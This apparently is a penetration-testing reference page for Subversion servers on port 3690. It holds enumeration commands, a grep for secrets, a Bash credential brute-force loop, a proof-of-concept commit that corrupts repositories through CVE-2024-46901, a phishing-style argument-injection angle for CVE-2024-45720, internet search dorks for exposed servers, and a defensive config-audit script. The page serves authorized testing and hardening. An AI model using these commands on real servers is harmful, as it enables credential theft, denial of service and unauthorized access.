3690 - Svn

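💡 Study tip: This document covers penetration testing methods for 3690 - Subversion SVN. It is intended as a reference for information security beginners and practitioners.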

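⚠️ Legal notice: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.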



3690/tcp - Pentesting Subversion (SVN) Server

Basic Information

Subversion (SVN) is a centralized version control system (Apache license) used for software versioning and revision control.

Default port: 3690/tcp (svnserve). It can also be exposed via HTTP/HTTPS through mod_dav_svn and via svn+ssh.

PORT     STATE SERVICE
3690/tcp open  svnserve Subversion

nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages

Enumeration

## Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

## If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

## Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo

Auth & Misconfig Hunting

  • svnserve.conf may allow anon-access = read (or even write). If you can list, try checkout to dump secrets, scripts, CI tokens.
  • Repositories frequently store build pipelines, deployment keys, and database credentials in versioned config files. Grep the working copy after checkout: grep -R "password\|secret\|token" -n ..
  • If svn+ssh is enabled, user shells often allow restricted svnserve commands; attempt ssh user@host svnserve -t with crafted subcommands to bypass wrappers.

Bruteforcing credentials (svnserve)

SASL authentication (if enabled) and simple password files are protected only by the transport, and there is no lockout by default. A quick Bash loop can try credentials:

for u in admin dev ci; do
  for p in $(cat /tmp/passlist); do
    svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
  done
done
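
Defender-side audit for the svnserve.conf weaknesses named under Auth & Misconfig Hunting and in the paragraph above (anonymous access, password files protected only by the transport). This is an added example, not code from the original page or the Subversion project; the finding names and both sample configs are constructed for illustration.

```python
import configparser

# Constructed sample configs for illustration (not taken from a real server).
WEAK_CONF = """\
[general]
# anon-access left commented out, so the built-in default (read) applies
# anon-access = none
auth-access = write
password-db = passwd
"""

HARDENED_CONF = """\
[general]
anon-access = none
auth-access = write
authz-db = authz

[sasl]
use-sasl = true
min-encryption = 128
max-encryption = 256
"""

def audit_svnserve_conf(text):
    """Return a sorted list of finding IDs for the text of an svnserve.conf."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    general = cp["general"] if cp.has_section("general") else {}
    sasl = cp["sasl"] if cp.has_section("sasl") else {}
    findings = set()

    # svnserve falls back to anon-access = read when the option is absent.
    anon = general.get("anon-access", "read").strip().lower()
    if anon == "write":
        findings.add("ANON_WRITE")                 # unauthenticated commits
    elif anon == "read":
        findings.add("ANON_READ")                  # anonymous ls/checkout

    if sasl.get("use-sasl", "false").strip().lower() != "true":
        if "password-db" in general:
            findings.add("PLAINTEXT_PASSWORD_DB")  # passwd file holds cleartext passwords
        findings.add("NO_TRANSPORT_ENCRYPTION")    # svn:// has no encryption layer without SASL
    elif int(sasl.get("min-encryption", "0")) == 0:
        findings.add("SASL_ENCRYPTION_OPTIONAL")   # default 0 = no encryption required
    return sorted(findings)

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_svnserve_conf(conf))
```

Run it against the text of each repository's conf/svnserve.conf; an empty list means none of these three conditions is present.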

Recent Vulnerabilities (practical impact)

mod_dav_svn denial of service via control characters (CVE-2024-46901)

  • A user with commit rights can write a path containing control chars (e.g. \x01, \x7f) that corrupts the repository, making later checkouts/logs fail and potentially crashing mod_dav_svn workers.
  • Affects Subversion ≤ 1.14.4 when served through HTTP(S) (mod_dav_svn). Fixed in 1.14.5.
  • PoC commit with svnmucc (requires valid commit creds):
## create payload file
printf 'pwn' > /tmp/payload
## commit a path with a control character in its name
svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
  • After the commit, normal clients may crash or refuse updates until admins manually remove the revision with svnadmin dump/filter/load.

Windows argument injection in svn client (CVE-2024-45720)

  • On Windows, “best-fit” character encoding in svn.exe allows command-line argument injection when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.
  • Affects Subversion ≤ 1.14.3 on Windows only; fixed in 1.14.4. Attack surface: phishing a developer to run svn on an attacker-controlled URL/path.
  • Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into " & calc.exe & "-style injected args, then trick the victim to run svn status or similar on that path.

Notes for Exploitation Workflow

  1. Check access method: svn:// (svnserve), http(s)://.../svn/ (mod_dav_svn), or svn+ssh://.
  2. Try anonymous read first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
  3. Enumerate hooks: hooks/pre-commit, post-commit scripts sometimes contain plaintext credentials or hostnames.
  4. Leverage svn:externals to pull additional paths from other hosts; list them with svn propget svn:externals -R . after checkout.
  5. Version leaks: HTTP response headers from mod_dav_svn usually show the Subversion & Apache version; compare against 1.14.5 to spot vuln targets.
  6. If you obtain filesystem access to the repo, svnadmin dump/svnlook author/svnlook dirs-changed allow offline analysis without credentials.

Search Engine Syntax

FOFA

# FOFA search syntax
port="3690"

Shodan

# Shodan search syntax
port:3690

ZoomEye

# ZoomEye search syntax
port:3690
